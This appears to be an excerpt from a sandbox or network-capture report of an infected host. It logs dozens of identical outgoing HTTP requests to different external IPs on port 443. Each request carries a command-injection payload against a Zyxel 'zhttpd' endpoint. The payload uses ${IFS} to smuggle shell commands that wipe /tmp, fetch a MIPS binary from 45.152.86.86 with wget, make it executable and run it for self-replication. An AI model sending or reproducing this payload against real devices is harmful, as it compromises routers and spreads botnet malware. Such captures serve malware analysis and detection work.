                              Mar 31, 2024 08:42:27.587629080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9881192.168.2.133352850.71.195.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587665081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9882192.168.2.135032849.66.89.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587681055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9883192.168.2.1355272223.44.21.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587721109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9884192.168.2.1343598150.19.156.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587785959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9885192.168.2.1339234193.201.16.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587805986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9886192.168.2.1348332188.8.171.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587841034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9887192.168.2.134195498.44.92.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587867975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9888192.168.2.1340614101.143.202.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587897062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9889192.168.2.133583017.141.13.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.587963104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9890192.168.2.1347566147.115.234.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588009119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9891192.168.2.135872661.18.202.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588059902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9892192.168.2.1340358158.204.232.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588105917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9893192.168.2.1335930145.21.72.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588120937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9894192.168.2.1348602213.118.76.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588175058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9895192.168.2.1355630171.185.44.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588239908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9896192.168.2.1349450101.103.38.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588278055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9897192.168.2.1347038155.220.10.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588313103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9898192.168.2.133869697.96.168.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588350058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9899192.168.2.134043642.40.144.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588401079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9900192.168.2.1349642102.18.3.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588430882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9901192.168.2.1339382135.6.152.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588489056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9902192.168.2.1341342138.217.149.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588516951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9903192.168.2.1346764147.13.28.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588557005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9904192.168.2.135712648.91.65.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588597059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9905192.168.2.1339388103.239.184.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588624001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9906192.168.2.134802423.5.20.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588682890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9907192.168.2.1339874184.185.25.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588715076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9908192.168.2.135908012.128.19.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588771105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9909192.168.2.135539227.148.33.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588802099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9910192.168.2.1336534132.99.17.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588871956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9911192.168.2.135542699.107.69.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588931084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9912192.168.2.133884060.242.14.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588934898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9913192.168.2.1335628196.164.65.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588954926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9914192.168.2.1339374138.117.35.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.588978052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9915192.168.2.1354602185.188.178.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589036942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9916192.168.2.135476880.137.169.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589075089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9917192.168.2.134090485.52.190.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589128971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9918192.168.2.1357400187.10.253.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589179039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9919192.168.2.133388414.124.12.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589179039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9920192.168.2.1360644200.64.76.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589245081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9921192.168.2.135318039.13.249.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589272022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9922192.168.2.1356808164.77.207.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589318991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9923192.168.2.1332836166.47.27.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589360952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9924192.168.2.1337440192.77.183.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589400053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9925192.168.2.1358588107.61.31.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589426994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9926192.168.2.1343058108.197.201.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589447975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9927192.168.2.134498653.0.67.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589513063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9928192.168.2.1339924177.168.100.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589553118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9929192.168.2.1336804106.140.209.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589586973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9930192.168.2.134354036.153.249.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589608908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9931192.168.2.1354188102.192.61.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589634895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9932192.168.2.135879844.54.65.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589673042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9933192.168.2.1335902219.183.115.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589699984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9934192.168.2.1345962117.108.137.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589750051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9935192.168.2.1358552137.103.24.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589781046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9936192.168.2.1355172144.169.205.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589812040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9937192.168.2.134748690.24.93.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589843988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9938192.168.2.1337298191.87.195.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589893103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9939192.168.2.135957217.43.139.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589927912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9940192.168.2.1357514157.126.99.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589951038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9941192.168.2.135781474.84.135.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.589986086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9942192.168.2.133488243.51.163.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590019941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9943192.168.2.1360724123.28.160.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590050936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9944192.168.2.1350650136.43.112.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590105057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9945192.168.2.1334742148.39.72.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590133905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9946192.168.2.1336426189.136.134.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590186119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9947192.168.2.135757276.12.15.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590224981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9948192.168.2.1333602159.51.133.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:27.590250969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9949192.168.2.13440128.198.112.43443
                              TimestampBytes transferredDirectionData
